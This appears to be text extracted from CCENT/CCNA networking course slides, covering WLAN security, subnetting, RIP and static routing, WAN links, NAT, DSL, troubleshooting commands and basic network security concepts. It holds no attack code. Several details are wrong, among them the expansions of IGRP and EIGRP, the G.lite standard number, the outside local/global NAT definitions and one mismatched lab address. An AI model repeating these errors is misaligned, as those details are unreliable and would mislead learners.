• During your CCNA studies, you learned about a Cisco switch feature called port-based authentication. This authentication scheme allowed a device to successfully authenticate only if its M AC address was considered secure for that particular port. There are WLANs set up to use MAC addresses in a similar fashion.

• Basically, the AP keeps a list of secure MAC addresses; devices with a secure MAC address can authenticate successfully, while those with a non-secure MAC cannot.


WEP, WPA, And WPA2

• These three WLAN security standards are the result of two evolutions:– WEP came first – WPA evolved from WEP – WPA2 evolved from WPA

• There are significant differences between the three, so let's take a look at each while comparing them at the same time.


• Wired Equivalent Privacy (WEP) has some real problems:– Clear-text keys – Static keys (makes passwords easier to guess) – One-way authentication (client does not authenticate

AP, making it easier for rogue access points to infiltrate the WLAN)

– Encryption scheme is very easily broken in a matter of seconds

88


• WEP supports two forms of authentication, open and shared key . Open authentication is pretty much what it sounds like - the virtual door to an AP is wide open. Any device can authenticate and then open communication with the AP. According to Cisco's website, if both devices are using WEP but the key on the client does not match that of the AP, authentication will succeed but data cannot be successfully passed.


• The next step in WLAN security was Wi-Fi Protected Access (WPA). WPA works with all wireless NICs, but you may have trouble running it on legacy (old) APs. If you can't run WPA on your APs, it's time to get some new APs.


• WPA's strengths:– Two-way authentication - AP authenticates the client,

client authenticates the AP – Dynamic keys and a stronger encryption scheme

through use of Temporal Key Integrity Protocol (TKIP, "tee-kip")

– WPA uses an 8-byte Message Integrity Check (MIC), sometimes called "Michael", to protect against replay attacks, spoofing, and man-in-the-middle attacks.

– WPA uses 802.1x or pre-shared keys (PSK) for authentication

89


• Some additional details regarding TKIP:– The use of TKIP made it possible to use legacy ("old")

hardware that had originally been created with WEP in mind.

– Both WEP and TKIP use the RC4 stream cipher for encryption, but TKIP protects RC4 keys via per-packet key mixing, which results in every packet having a unique encryption key


• WPA requires the use of a passphrase rather than a password. The recommended length of a passphrase is 20 - 30 characters, which will immediately have some users running WEP simply because WEP allows a short password to be configured.


• There are other potential issues with WPA:– There's always the legacy issue to consider when it

comes to backwards compatibility, but at this point, you should strongly consider replacing WLAN equipment that does not support WPA or a later, stronger solution.

– There's a potential issue with "Michael" (MIC). Access points that run WPA will shut down their Basic Service Set if it receives two packets, one right after the other, that has a bad MIC. A DoS attack specifically designed to counteract Michael can take advantage of this situation.

90


• Another potential issue lies with the use of pre-shared keys (PSK). If a small passphrase is allowed and then intercepted, a dictionary attack can be run by an attacker, resulting in a compromised passphrase.


• Here's what happened next:– After WPA was ratified by the Wi-Fi Alliance,

the IEEE came out with 802.11i. – After the IEEE came out with .11i, the Wi-Fi

Alliance came out with WPA2.

• The good news: .11i and WPA2 are fully compatible and interoperable.


• That's about it for this introduction to WLANs! I've probably gone into more detail here than you'll nee d for the CCENT, but with wireless LANs growing rapidly in popularity, you need to know as much about WLANs as you possibly can.

• You will see more about WLANs in your CCNA studies, but even if you choose not to progress pas t the CCENT, do yourself a favor and continue your studies of wireless networking. Your career will thank you for it!

91


Video 9Binary Math and Subnetting


Binary Math and Subnetting

• “The Secret” (Of Binary Success, That Is)• Decimal > Binary, Binary > Decimal• Subnetting Basics• Calculating Number of Valid Subnets• Prefix Notification• Calculating Number of Valid Hosts• Calculating Number of Valid IP Addresses in a Given

Subnet• Calculating the Subnet Number of a Given IP

Address• Meeting Stated Design Requirements


• Class A: 1 - 126, 8 NW Bits, 24 Host Bits• Class B: 128 - 191, 16 NW Bits, 16 Host Bits• Class C: 192 - 223, 24 NW Bits , 8 Host Bits• Class A: 255.0.0.0• Class B: 255.255.0.0• Class C: 255.255.255.0

92


• Determining The Number Of Valid Subnets– Number of subnets = (2 squared by the number of

subnet bits) – Now here's the interesting part: You *may* need to

subtract 2 from that result to get the correct answer.• You should subtract 2 from the result if:

– You see the no ip subnet-zero command in the configuration. This command will appear near the top of the router configuration.

– The routing protocol is classful, and that means RIPv1 or IGRP.


• You should not subtract 2 from the result if:– The classless protocols RIPv2, EIGRP, or OSPF are in use.– The term "VLSM" for "Variable-Length Subnet Masking" is used.

• The ip subnet-zero command appears in the configuration. This is the default setting, and you' ll see it near the top of the router configuration:

username R1 password 0 CCNA

ip subnet-zero

no ip domain-lookup


Prefix Notation

• Prefix notation is a quicker way of stating what the subnet mask of a network is. Note that the subnet mask consists of a number of consecutive 1s. Prefix notation is simply a slash followed by the number of 1s in the subnet mask. The subnet mask 255.255.255.0 is instead referred to as “slash 24” when spoken, or “/24” when written. This is the generally accepted way subnet masks are spoken and written about.

93


• Review the rules for network, subnet, and host bits:

A. The rules for Class A, Class B, and Class C determine the network portion.B. Compare the remaining bits of the default and actual mask. The portion where the Default Mask and Subnet Mask both have zeroes is the host bits portion of the address.C. The remaining bits – where the Default Mask has zeroes but the Subnet Mask has one – are the subnet bits. These are the bits that are being “borrowed” from the host bits.


• Determining The Number Of Valid Hosts– To determine the number of valid hosts, a somewhat

similar formula is used:

• Valid Hosts On A Subnet = (2 squared by number of host bits) – 2– Thankfully, we always subtract the two when

determining the number of valid hosts on a subnet.


• Determining The Subnet Number Of A Given IP Address– Given an IP address and subnet mask, determining

the subnet it resides on is accomplished by performing a Boolean AND operation. First, the IP address and its subnet mask will be converted to binary. The Boolean AND is simply a bit-by-bit comparison of the address and the subnet mask.

– If both bits are 1, the result of the Boolean AND is 1. If a 0 is set for that bit on either the subnet mask or IP address, or both, the result of the AND is a 0.

94


• Determining The Range Of Valid Host Addresses On A Subnet

• To determine the range of valid host addresses on a subnet, first determine how many overall host addresses are on that subnet. The first address in the range is the network number and is not a valid host address; the final address in the range is the broadcast address for that subnet and is not a vali d host address. All addresses between the two are valid host addresses.


Meeting Stated Design

Requirements

• Consider this question:– “Your network uses Class B network 165.10.0.0. You

need at least 150 subnets that have no more than 200 hosts apiece. Which of the following subnet masks should you use?”

– Remember the formulas for determining the number of subnets, or the number of valid hosts per subnet:

• Number of subnets = (2 to the nth power), where n equals the number of subnet bits.

• Number of valid hosts on a subnet = (2 to the nth power) – 2, where n equals the number of host bits.


Watch Our For Overlapping Networks!

• You could see something like this on your exam, but this word of advice is valuable for your real-world experiences - when you're building on someone else's subnetting scheme, watch out for overlapping networks.

• By overlapping networks, I mean two subnets in the same network that are "overlapping" and therefore using the a few of the same IP addresses.

• This is particularly true when you're left with a f ew address blocks from a subnetting scheme that you didn't create. Let's use the following network for a n example.

95


• 50-host network address range: 10.1.1.65 - 10.1.1.126

• Range for 10.1.1.0 /25 network: 10.1.1.1 - 10.1.1.126 - Overlaps With Preexisting Subnet!

• Range for 10.1.1.128 / 25 network: 10.1.1.129 - 10.1.1.254 - Does Not Overlap With The 50-host network.


Video 10Static Routing And RIP


Static Routing And RIP

• Static Routing Theory and Labs• RIP Routing Theory and Labs• “show ip protocols”, “show ip route

rip”, “debug ip rip”, And More!

96


• For this example and all others in this course, the last octet of the IP address for any physical inter face will be the router number. That's a good habit to ge t into for your home lab studies as well. For loopbacks, we'll use the router number for each octet.– The networks used in this section:– Frame Relay (Serial interfaces, all routers): 172.16.123.x /24 – R2's loopback interface: 2.2.2.2 /24 – R3's loopback interface: 3.3.3.3 /24


• We're going to use pings to test IP connectivity throughout this section. When you ping a remote IP address, you're sending five ICMP Echo packets to the IP address you specify. If we get five ICMP Echo Replies in return, you'll see five exclamation points, and that means you do have IP connectivity to the specified destination.


• WARNING: Do NOT practice debugs on a production network. Some debugs, especially debug ip packet, can overwhelm a router or switch CPU and render the device unable to route or switch.

• It's important to know how the debug output will lo ok when things are running correctly, because that's the only way to know what you're looking for when things aren't running correctly. If you have a home lab, make sure to run plenty of debugs as you work -but never practice them at work.

97


• Since we're in the static routing section of the course, let's choose a static route! We use the ip route command to create static routes, and we actually have two more choices when it comes to static routes. We can create...– A static route to a given host or destination network – A default static route, which will be used when there

is no other match in the routing table for a destination network


• At this point in the ip route command, you must specify one of these two values:– The local router's exit interface type (NOT the

IP address) – The remote router's IP address that we want

to send that packet t


• When you send pings, it's not enough for the local router to have connectivity to the remote network - the downstream routers need connectivity to that remote network as well!

98


• The syntax for a default static route looks a bit o dd, so be ready to identify it on the exam:

R1#conf tEnter configuration commands, one per line. End

with CNTL/Z.R1(config)#ip route 0.0.0.0 0.0.0.0 172.12.123.2

• Both the destination network and the mask are all zeroes in a default static route. As with a "regular " static route, we have the option of configuring a next-hop IP address or the local router's exit interface.


• Default static routes serve two major purposes, one of which we've just seen - we can send data to networks that have no specific entry in the routing table. This also helps to keep routing tables concise and complete, and as you advance in your Cisco studies, you'll learn that it's important to control the size of the routing table while keeping it complete.


• Static routes have their place, but they're not ter ribly scalable. Scalability refers to a network feature or protocol's ability to remain useful without a great deal of manual intervention as the network grows, and it's a term you'll hear often in your Cisco stu dies and your real-world job.

• Static routes do not dynamically adapt to network changes, and they can be a pain to keep up with as your network grows. That's why they're not considered very scalable.

99


• A better choice for routing is the use of dynamic routing protocols. You've probably heard of one or more of the following:– RIP (Routing Information Protocol) – IGRP (Integrated Gateway Routing Protocol) – EIGRP (Enhanced Integrated Routing Protocol)

– OSPF (Open Shortest Path First)


• There are two versions of RIP, and while you're almost always going to run the more recent of the two, you need to know about them both for the exams and just in case you do run into the original version in the field. We're going to use almost the same network we used in the static route discussion here in our RIP discussion, with the only difference being an additional loopback address, 1.1.1.1, added to R1.


• Why change the default? Version 1 is quite limited in that it is a classful protocol, while Version 2 is a classless protocol. This is one time when it's goodto be classless!

• In your CCNA studies, you'll be introduced to manua l route summarization and variable-length subnet masking (VLSM). I won't show you those advanced skills now because we need to concentrate on the basics, but I do want you to know that RIPv1 does not support either of those, while RIPv2 supports both.

100


• RIPv1: classful, no VLSM, no manual route summarization

• RIPv2: classless, VLSM support, manual route summarization support – To force RIP to send and receive only v2

updates, use the version 2 command under the RIP process.


• The incoming update from R1's serial0 interface mentions "hops" several times, where the outgoing update mentions a "metric". They're actually the same thing.

• Both versions of RIP use hop count for their metric, a measurement of how far it is to a remote destination. That's a serious limitation for RIP whe n it comes to Wide Area Networks (WANs), because RIP will consider both paths in the following exampl e to have the same metric.


Video 11Wide Area Networks (WANs)

101


Wide Area Networks (WANs)

• Physical Side of WANs• Directly Connecting Cisco Routers Via Serial

Interfaces• HDLC and PPP• Intro to Frame Relay• RFC 1918 Addresses, NAT and PAT• Intro to ATM• Modems and DSL Variations


The Physical Side Of WANs

• Going back to the previous illustration, one reason we refer to the WAN connection as a "cloud" is that we don't kno w exactly what hardware is in use in the WAN, and we're not r esponsible for it - that's up to the service provider, the comp any that sells WAN services such as Frame Relay.

• What we are responsible for are the routers you see in that diagram, and our routers are going to have to commu nicate with one of the service provider's devices. The serv ice provider's half of this communication is an externa l channel service unit / data service unit , which thankfully is referred to as a CSU/DSU.


• At some point, the responsibility for the physical devices passes from us as network admins to the service provider. This is the demarcation point , typically referred to as the demarc point . In theory, the demarc point is easy to define; when you're arguing with the service provider on a Friday afternoon when everyone wants to go home, the exact location of the demarc point suddenly becomes a huge point of contention.

102


• Theoretically, the demarc point is found at the CSU/DSU. The cable leading from the CSU/DSU to the router and the CSU/DSU itself is considered to be the customer's equipment and responsibility. That's us! All cabling on the "other side" of the CSU/DSU, along with the hardware in the WAN cloud, is the service provider's equipment.


• The CSU/DSU fills the router in on a very important piece of information, the clock rate. When the CSU/DSU does this, it's basically telling the router "here's how quickly you can send and receive data". Later in this section, we'll simulate a point-to-point link on a Cisco router and you'll see the command that allows a Cisco router to give another router this vital information.


• When it comes to the clockrate:– The Data Communications Equipment (DCE)

provides the clockrate – The Data Terminal Equipment (DTE) receives

the clockrate. By default, a Cisco router acts as a DTE.

103


• We're going to discuss two common WAN protocols in just a moment, and I want you to see the show commands that verify these protocols. To do so, we're going to use a configuration that isn't common in real life, but is very common in home labs. We're going to use two Cisco routers that are directly connected at their Serial0 interfaces, which means that one must serve as the DCE. We also need a special cable, the aptly-named DTE/DCE cable.


• After connecting the cable to the respective router s, use show controller serial x to ensure the router sees the cable as a DCE or DTE. You will see a grea t deal more output than this when you run this command, but the information that's important to us right now is at the very top.

R3#show controller serial 1HD unit 1, idb = 0x1C44E8, driver structure at 0x1C BAC8

buffer size 1524 HD unit 1, V.35 DCE cable


• Here's what show interface serial 1 on R1 reveals before the clockrate command is configured:

R1#show interface serial 1Serial1 is up, line protocol is down

Hardware is HD64570Internet address is 172.12.13.1/24MTU 1500 bytes, BW 1544 Kbit, DLY 20000 usec,

reliability 255/255, txload 1/255, rxload 1/255Encapsulation HDLC, loopback not set

104


• When you see the physical interface up and the line protocol down, there's some kind of logical problem with the interface. In this case, the DTE side is not receiving the required clockrate. Once we do configure the clockrate on the DCE's Serial1 interface, the line protocol comes up and stays up. No reset or reload is needed.


• I know I've mentioned this already during the course, but this truly bears repeating as it's a fundamental rule of troubleshooting:– If the interface shows as administratively down, it's

simply shut down manually and needs to be opened.– If the interface shows as down, there's a physical

problem, perhaps a loose cable.– If the interface is up but the line protocol is down, that

means the interface is physically fine but there's a logical issue, generally an encapsulation mismatch or missing clockrate.


• Real-world hint: If you're troubleshooting a line protocol issue and you see the line protocol come up, make sure to stick around for a minute and make sure it staysup. Also, the line protocol may show as up for about 20 seconds or so after you first open a Serial interface, but stick around and make sure it stays up.

105


• HDLC and PPP are the two data-link (Layer 2) protocols to consider when choosing an encapsulation method across a serial point-to-point link.

• The version of HDLC that runs on Cisco routers is Cisco-proprietary, making it unsuitable for multivendor environments. If RouterA is a Cisco router running HDLC, the only way the line protocol can come up is if the remote router is also a Cisco router running HDLC.


• There are major points of distinction between the two. First, HDLC is the default encapsulation for a Cisco serial interface. Here's the output of show interface serial 1 from the previous discussion. The encapsulation is defaulting to HDLC.


• PPP allows data compression to be configured, where HDLC does not. Compression is performed on data before it's sent across the WAN, and the data then uses less bandwidth to send the data across the WAN.

• PPP multilink allows multiple physical channels to be bundled into a single logical channel. HDLC offers no multilink capability.

• PPP allows the use of two authentication schemes for point-to-point links (PAP and CHAP), which HDLC does not support either of these.

106


• To review:– HDLC is the default encapsulation on a Cisco

router's Serial interface.– PPP has features that allow the use of

authentication and data compression.– PPP also allows multilink bundling, where

HDLC does not.


An Introduction To Frame Relay

• Frame Relay's got three things going for it that endears it to network admins:– it's cheap – it's reliable – it's cheap and reliable


• In the case of Frame Relay, we call our friendly Fr ame Relay Service Provider and tell him where our routers are , and how much bandwidth we're willing to pay for. The provide r then configures some of his frame relay switches, gives us a few numbers to add to our router configuration, and we' re all set!

• The frame relay service provider guarantees a certa in amount of bandwidth will be available to a given user at a ny time. The more guaranteed bandwidth desired, the more it cost s, but it’s still cheaper than a dedicated point-to-point link. This guaranteed bandwidth is referred to as the committed information rate (CIR).

107


• Frame relay is a packet-switching protocol. The packets may take different physical paths to the remote devices, at which point they will be reassembled and will take the form of the original message. In contrast, circuit-switching protocols have dedicated paths for data to travel from one point to another.


• There are two types of virtual circuits, one much more popular than the other. A permanent virtual circuit (PVC) is available at all times, where a switched virtual circuit(SVC) is up only when certain criteria are met. You're going to see PVCs in most of today's networks, and we'll build some during your CCNA studies.


• You were introduced to the three RFC 1918 private address ranges in the IP Addressing section, but let's review them here:– Class A: 10.0.0.0 - 10.255.255.255 (10.0.0.0 /8) – Class B: 172.16.0.0 - 172.31.255.255 (172.16.0.0 /12)

– Class C: 192.168.0.0 - 192.168.255.255 (192.168.0.0 /16)

108


• You also learned that these addresses are not routable - without any additional help, hosts with these addresses will not be able to communicate with any other hosts outside their private network. That means no internet access and no communication with other hosts across the LAN!


• The actual NAT and PAT translation table can be viewed with the command show ip nat translation. Even if you're running PAT, the commands will still reference NAT.

R3#show ip nat translationsPro Inside global Inside local Outside local Outside g lobal--- 210.1.1.2 10.5.5.5 --- ---

--- 210.1.1.3 10.5.5.6 --- ------ 210.1.1.4 10.5.5.7 --- ---


• Notice those four terms in the translation table - " inside global", "inside local", and so forth? Here's what t hey mean:

• Inside local addresses are used by hosts on the inside network to communicate with other hosts on that sam e network. These are the addresses that are actually configured on the hosts, and generally they are RFC 1918 private addresses.

• These inside local addresses are translated into inside global addresses . Inside global addresses are routable addresses. In the following example, 10.2.2.2 is the inside local address and 210.1.1.2 is the inside gl obal address.

109


• Outside global addresses are the addresses that are configured on the outside hosts. These are fully routable addresses used by Internet-based hosts.

• Finally, outside local addresses are the actual addresses of remote hosts. These can be (and probably are) RFC 1918 addresses as well.


• What follows is strictly an overview of some other WAN communication methods, and with ATM, it's really an overview! Configuration of ATM is far beyond the scope of the CCENT and CCNA exams, but it's a good idea to know the basics.

• The Asynchronous Transfer Mode (ATM) is unique in that it does not handle frames, as Frame Relay does. ATM places data into cells, and all ATM cells are exactly the same size, 53 bytes - 48 bytes of da ta and a 5-byte header.


• Remember the Frame Relay switches that made up the Frame Relay cloud? ATM works along the same lines in that the service provider maintains ATM switches. ATM networks are much faster than Frame Relay networks, but are more expensive to build and maintain. That includes the need for specialized hardware. You can't just sit down and configure ATM on a Cisco serial interface as you could Frame Relay - you'll need special interfaces to use ATM.

110


• Some ATM documentation says that ATM is a packet-switching service like Frame Relay, and technically that's true, but more commonly you'll hear ATM referred to as cell-switching. After all, that's what ATM switches!


• On the other end of the speed spectrum, we've got modems - and yes, they're still out there! In the previous CSU/DSU illustrations, a modem could and sometimes does take the place of the CSU/DSU.

• The word "modem" actually comes from the two operations they carry out:– Modulation, the process of translating digital signals into analog

signals that can be carried over a phone line – Demodulation, the process of translating those analog signals

back into digital signals that the receiving device can understand


• The two real drawbacks of modems are:– They're not as fast as other methods – They tie up the phone line, and other calls

cannot be made while the modem is using the line

111


• Asymmetrical DSL works under the assumption that the user will download more information than they send, and for the average Internet user, that's a s afe assumption. The connection speed from the provider to the user is going to be 3 - 4 times faster than t he speed from the user to the provider. A typical ADSL connection of 512 kbps will give the user 384 KBPS download capabilities, but only 128 KBPS uploading capability.

• ADSL allows a telephone call and internet access simultaneously.


• ADSL uses several different modulation methods, but the most well-known is G.lite (also known as G.922.2) , which requires no splitter at the customer location. The customer simp ly hooks up a G.lite modem in the same way an old-fashioned analog modem would be installed.

• G.lite's limitation is speed - where standard ADSL c an offer 8 MBPS download speed and 1.5 upload speed, G.lite's maximum capability is 1.5 MBPS downloading and 512 KBPS uploading. The key is that while G.lite is slower th an true ADSL, it's still a lot faster than the dialup optio ns available to today's home users.


• The distance limitation of ADSL must be taken into account as well. Officially, there's an 18,000-foot limitation on ADSL services, but most ISPs put a lower limit on ADSL to avoid poor quality service for those near the end of the cable. Of course, that limitation is for data transmission, not voice.

• Since we have asymmetric DSL, it makes sense that we'd have symmetric DSL (SDSL) as well. The term "symmetric" refers to the fact that the sending and receiving speed are the same. The drawback is that the phone cannot be used while SDSL is in use.

112


• Two less-common DSL flavors:• Very High Bit-Rate DSL (VDSL) has the capability to

deliver speed up to 52 MBPS. That's am amazing speed to deliver over copper wire, but there's a drawback - VDSL over copper has a maximum distance of 4000 feet. As more fiber-optic cable is installed by the telephone companies, VDSL is becoming available in more communities as the distance issue is resolved by the use of fiber.


• Rate-Adaptive DSL (RADSL) is just what it sounds like - the software calculates the maximum download and upload speeds on the customer's preexisting phone line and dynamically adjusts those rates.


Video 12Troubleshooting

113


Troubleshooting

• Where to Begin• Cisco Discovery Protocol (CDP)• L1 and L2 Troubleshooting• LAN Troubleshooting• WAN Troubleshooting• Extended Ping and Traceroute• Telnet and SSH Review and Maintenance Commands• Administrative Distance• The Real Key to Troubleshooting


• When you begin troubleshooting, make sure everything's working at the Physical layer of the OSI model. That's a formal way of saying…– Is this thing on? – Is the right cable in use?– Has the cable come loose just enough to

bring things down?


• That first bullet point is self-explanatory, so I'll leave that one alone. When it comes to the right cable, remember the basics:– Crossover cables are required to connect switches for

trunking – Rollover cables are required to connect a laptop to

the Console port of a router, and you may need an adapter to use a rollover cable with your laptop

114


• You can check a Cisco device's physical connections with Cisco Discovery Protocol , which runs by default on Cisco routers and switches, both globally and on a per-interface level.


• For security purposes, many admins choose to disable CDP. Here's the command to see if CDP is indeed running on a router or switch:

Router1#show cdpGlobal CDP information:

Sending CDP packets every 60 secondsSending a holdtime value of 180 secondsSending CDPv2 advertisements is enabled


• That output means that CDP is indeed enabled. If you see the following, it's off. But you didn't need me to tell you that!

Router1#show cdp

% CDP is not enabled

Router1#

115


• Device ID is the remote device's hostname.• Local Interface is the local switch's

interface connected to the remote host.• Holdtime is the number of seconds the local

device will retain the contents of the last CDP Advertisement received from the remote host.


• Capability shows you what type of device the remote host is. The first two connections are to a switch, and the third is to a router.

• Platform is the remote device's hardware platform. The top two connections are to a 2950 switch, and the third is to a 2520 router.

• Port ID is the remote device's interface on the direct connection.


• When an interface is functioning correctly, this is what we see at the top of the show interface output.

Router1#show int serial0

Serial0 is up, line protocol is up

116


• Of course, if the interface looked like that, we wouldn't be troubleshooting, would we? Let's take a look at common show interfaceoutputs that do indicate a problem, along with the solutions for these issues.

Router1#show int serial0

Serial0 is administratively down, line protocol is down


• This one's easy! administratively downmeans the interface is indeed shut down. Open the interface with no shutdown.

Router1(config)#int serial0

Router1(config-if)#no shut


• Always give the line protocol a minute or so to come up after opening a serial interface.

Router1#show interface serial0

Serial0 is up, line protocol is up

117


• Success! Let's look at another potential readout:

Router1#show interface serial 0

Serial0 is down, line protocol is down


• After plugging this loose cable back in ....

Router1#

20:14:47: %LINK-3-UPDOWN: Interface Serial0, changed state to up

20:14:48: %LINEPROTO-5-UPDOWN: Line protocol on Interface Serial0, changed state to up


• There's one other reason a port can be down physically, and you saw this in the Switching section:


FastEthernet0/3 is down, line protocol is down (err-disabled)

118


• There's one more physical / line protocol combination we have to be ready to troubleshoot:

Router1#show int serial 0

Serial0 is up, line protocol is down


• If a switch encounters a problem while you're configuring it, it's probably because you just misconfigured something. Undo what you just did. The same goes for routers. No big deal, just fix it.

• Simple, right? Right!


• If we were still not able to ping between those two hosts, I would check the VLAN port membership on the switches with show vlan brief.

• You'll see more of this in your CCNA studies, but remember - if hosts are in different VLANs, they will not be able to send IP packets to each other without a Layer 3 device being involved.

119


• Just with that simple network, we ran into quite a few things that could have been the cause of the issue:– Ethernet interface not open – Ethernet interface had no IP address – Hosts in different VLANs – Loose cable (show interface verified the

physical cable was fine)


• For real-world PC troubleshooting, you can run ipconfig /all to check a host's IP address, network mask, DNS server location, and much more. This is where I always start troubleshooting when a PC can't access network resources. The CCENT exam is not a PC troubleshooting exam, but since we do spend a good amount of time working with PCs as network admins, it's a good idea to be very familiar with the output of this command.


• Here are some other Microsoft PC commands you may find helpful:

• ipconfig /release will release the PC's DHCP-assigned information.

• ipconfig /renew will actively ask the DHCP server(s) for an IP address and other information needed for LAN connectivity, including DNS server location.

120


• netstat -rn displays the host's routing table. Yes, PCs have routing tables!

• It's my experience that ipconfig /all is the best place to begin troubleshooting at the PC level - but don't forget to check the cables first!


Telnet And SSH

• We discussed both of these tools in depth in another section, so I won't do so again here. A couple of things to watch with both Telnet and SSH:– Cisco routers do not allow users to connect

via Telnet or SSH by default. A password must be set on the VTY lines.


• Users who connect to a router via Telnet or SSH wil l by default be put into user exec mode, and for thos e users to have access to enable mode, an enable password must be set, *or* you must configure the privilege level 15 command on the VTY lines - that will place the incoming user into enable mode immediately upon VTY authentication.

• Telnet sends all data in clear text; SSH encrypts a ll data, including passwords, but SSH does require more configuration and possible extra hardware, depending on the size of the deployment.

121


• If you have multiple Telnet sessions open, you can run show sessions to get basic information about each one.

BRYANT_ADVANTAGE_2#show sessions

Conn Host Address Byte Idle Conn Name

1 blondie 100.1.1.1 0 1 blondie

2 angeleyes 110.1.1.1 4 1 angeleyes

* 3 tuco 120.1.1.1 0 0 tuco


• To reconnect to any given Telnet session, you can use the resume command followed by the connection number, or just enter the connection number. To resume the connection to tuco, you could enter resume 3or just the number 3.

BRYANT_ADVANTAGE_2#3

[Resuming connection 3 to tuco ... ]


• To suspend the open session, use this key combination:

< CTRL - ALT - 6 >, followed by < X >

122


• To disconnect any open session, use the disconnect command followed by the connection number. You will be prompted to confirm this request.

BRYANT_ADVANTAGE_2#disconnect 2

Closing connection to angeleyes [confirm]


• We could use show sessions to verify, but we'll use the where command instead. show sessions and where do the exact same thing, so watch that on exam day!

•

• BRYANT_ADVANTAGE_2#where

• Conn Host Address Byte Idle Conn Name

• 1 blondie 100.1.1.1 0 8 blondie

• * 3 tuco 100.1.1.1 4 1 tuco


Ping And Traceroute

• You've seen "regular ping" throughout the course, and that strange phrasing may make you wonder "What do you mean, regular ping?" The ping we've seen throughout the course simply specified a destination IP address, and we received one of three returns so far:

123


• !!!!! -- IP connectivity to destination exists

• ..... -- IP connectivity to destination does not exist

• U.U.U -- The local router has a route to the destination, but a downstream router does not


Router1#traceroute 208.109.62.234Type escape sequence to abort.Tracing the route to 208.109.62.234

1 73.141.64.1 8 msec 8 msec 12 msec2 68.86.174.161 12 msec 12 msec 12 msec3 68.86.172.6 12 msec 12 msec 12 msec4 68.86.172.85 12 msec 12 msec 12 msec5 67.17.194.98 12 msec 12 msec 16 msec6 67.17.194.97 24 msec 16 msec 16 msec7 64.214.196.22 76 msec 76 msec 76 msec8 66.235.224.6 80 msec 80 msec 76 msec9 208.109.112.137 76 msec 80 msec 76 msec

10 208.109.112.161 80 msec 80 msec 76 msec11 208.109.112.145 80 msec 76 msec 80 msec12 208.109.112.173 80 msec 80 msec 76 msec13 * * *14 * * *15 * * *16 * * *


• By the way, if you just let those asterisks keep coming, you're going to see 30 rows of them. If you're running this command and someone else is there, they're going to ask the musical question:– "Is it supposed to be doing that?"

124


• At the beginning of the traceroute output, the route r says "Type escape sequence to abort." Did you also notice that the router doesn't tell you what the sequence is? ARRRGH!!!

• That can be pretty frustrating and/or embarrassing, so I'll tell you what that sequence is. Don't tell anybody else, it's our secret:

< CTRL - SHIFT - 6>


• Microsoft offers a version of traceroute as well - u se the tracertcommand to see the options.

C:\>tracertUsage: tracert [-d] [-h maximum_hops] [-j host-list ] [-w

timeout] target_nameOptions:

-d Do not resolve addresses to hostnames.

-h maximum_hops Maximum number of hops to search for target.

-j host-list Loose source route along host-list.-w timeout Wait timeout milliseconds for each

reply.


• Consider this routing table:

D 191.168.32.0/26 [90/25789217] via 40.1.1.1 (D = EIG RP route)

R 191.168.32.0/24 [120/4] via 50.1.1.2 (R = RIP)

O 191.168.32.0/19 [110/229840] via 60.1.1.3 (O = OSPF )

125


• What if the routes for a destination are all the same? Consider the same table, but with subnet masks of the same length for each protocol.

D 191.168.32.0/24 [90/25789217] via 10.1.1.1

R 191.168.32.0/24 [120/4] via 10.1.1.2

O 191.168.32.0/24 [110/229840] via 10.1.1.3


• Two key points about administrative distance:– AD is a measure of a route's

believability. The lower the AD, the more believable the route. This is one time when bigger is NOT better!

– AD only comes into play when there is a tie in the "longest match" route comparison, as shown previously.


Route Source Administrative Distance

Directly Connected 0Static 1EIGRP Summary 5Internal EIGRP 90IGRP 100OSPF 110ISIS 115RIP 120External EIGRP 170iBGP 200

126


• The Real Keys To Becoming A World-Class Troubleshooter– Learning to troubleshoot networks is just that - a

learning experience. I've been in IT for well over a decade and I learn something new every day. I have always loved troubleshooting, and I can tell you this from personal experience: Troubleshooting is all about knowing the fundamentals *and* having a structured approach. Learn the fundamentals, develop your own approach, and you will be totally unstoppable in both the exam room and dealing with real-world networks.


Video 13Introduction to Network

Security


Introduction to Network Security

• Firewalls and Proxy Servers• The Attacker’s Arsenal• Intro to PIX, ASA, IDS, and IPS• Viruses, Worms, and Trojan Horses• Preventing Virus Attacks• One Final Cisco “Secret”• A Final Word

127


Firewalls

• A firewall is your basic protection against Internet-based attackers. A firewall is a physical device that filters packets heading for your network, and those filters are set to block attempts to harm your network. The firewall shown in the following illustration is generally where you see them in networks -between the inside network / end users and the Internet.


• protocol ("don't allow any IPX traffic") • source IP address ("don't allow any

traffic from the 172.10.1.0 /24 network to exit the network")

• port number ("don't allow any traffic sourced from port 23 to enter the network")


• Users cannot receive email. Make sure the incoming POP3 port (110) is open. This happens a lot when new firewalls are put in.

• Users cannot send email. Make sure the outgoing SMTP port (25) is open.

• You need to block users from accessing the Web. Make sure the HTTP egress ("outgoing") port is blocked.

128


• Network attackers can have one or more agendas:– Financial gain, possibly blackmailing you for

access to your stolen and now inaccessible data

– Simply seeing if they can gain access, just for the fun of it

– Damaging the network for personal satisfaction


• One network attack type is a Denial of Service (DoS) attack . Basically, the attacker(s) attempt to overwhelm the server with TCP connection requests, which has two negative effects:– Legitimate users cannot access the server due to

network congestion caused by the DoS requests – The attacked server's resources are so busy

attempting to answer the service requests that it cannot answer legitimate requests, or the server simply crashed under the load


• A DoS attack is really designed more to damage network access than to steal data. A common technique to steal data and perhaps profit by its sale or use is a combination of reconnaissance attacks and access attacks.

129


• When a military patrol goes on a reconnaissance mission, it's not looking for a fight with the enem y; it's gathering information for a future attack, loo king for strengths and weaknesses. That's exactly what a reconnaissance mission is in networking. The intruder uses different techniques to gather information about your network's strengths and weaknesses, and the intruder will return later and utilize that information to his advantage - and your dismay.


• While the information gathered during a reconnaissance attack can be used for a DoS attack, most likely it'll be used for an access attack. That's where data is actually compromised and/or stolen by the intruder for their own personal use, financial gain, or occasionally just to embarrass the company they stole the data from.


• With so many different external network threats, it 's really not enough to "just" have a firewall in plac e today. That's why Cisco developed the Adaptive Security Appliance. From Cisco's website, here's how they describe the ASA:

• "The Cisco ASA Series controls network and application traffic, delivers flexible Virtual Priv ate Network (VPN) connectivity, and reduces the overall deployment, operations costs and complexity that would otherwise be associated with this level of comprehensive security."

130


• When reading white papers and sales documents regarding the ASA, you'll come across an interestin g term - " anti-x ". No, "x" isn't some new mysterious virus or network security issue! "x" is simply used by Cisco to encompass all of the "antis" the ASA offers, such as "anti-virus" and "anti-spam". Instea d of listing all of the "antis" their product offers, Cisco simply says "anti-x". Just wanted you to know so it wouldn't make you wonder as it did me the first tim e I saw it! ;)


• Cisco also offers the Intruder Detection System (IDS), which Cisco's website describes as…

